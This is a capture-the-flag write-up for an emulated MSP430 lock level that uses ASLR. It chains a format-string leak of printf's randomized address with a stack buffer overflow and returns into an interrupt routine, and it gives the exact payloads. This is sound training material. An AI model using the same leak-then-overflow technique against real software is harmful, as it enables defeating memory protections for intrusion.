This level introduces <rand> and <aslr_main> to implement ASLR.

We can immediately identify that there is a stack buffer overflow tied to the Password: input. This grants us control of the PC / Return Address.

Hex Input: 0102030405060708090a

pc: 0a09

Now that we have control of the PC, we need to trigger the 0x7f interrupt to solve the level.

We want to use <_INT> as we have control over 0x2(sp).

<_INT>: 
mov	0x2(sp), r14
push	sr
mov	r14, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10
pop	sr
ret

So the goal is to return to <_INT> with our 0x7f located at 0x2(sp).

However this is problematic since the address of <_INT> is being randomized. We do not know what to overwrite the return address with.

Fortunately, we can get a leaked address with a format string bug in the Username: input. The address of <printf> after randomization is located on the stack.

We can read this value by providing Username: an input of %x%x.

A sample output:
Username (8 char max):
>>0000e1fe
Password:


Now that we have the address of <printf>, we can obtain the address of <_INT> by identifying the offset between the two functions.

That is 48ec <_INT> - 476a <printf>. So <_INT> is located at <printf> + 0x182

Our winning password input is 414141414141414180e341417f00   which returns to <_INT> and triggers the 0x7f unlock.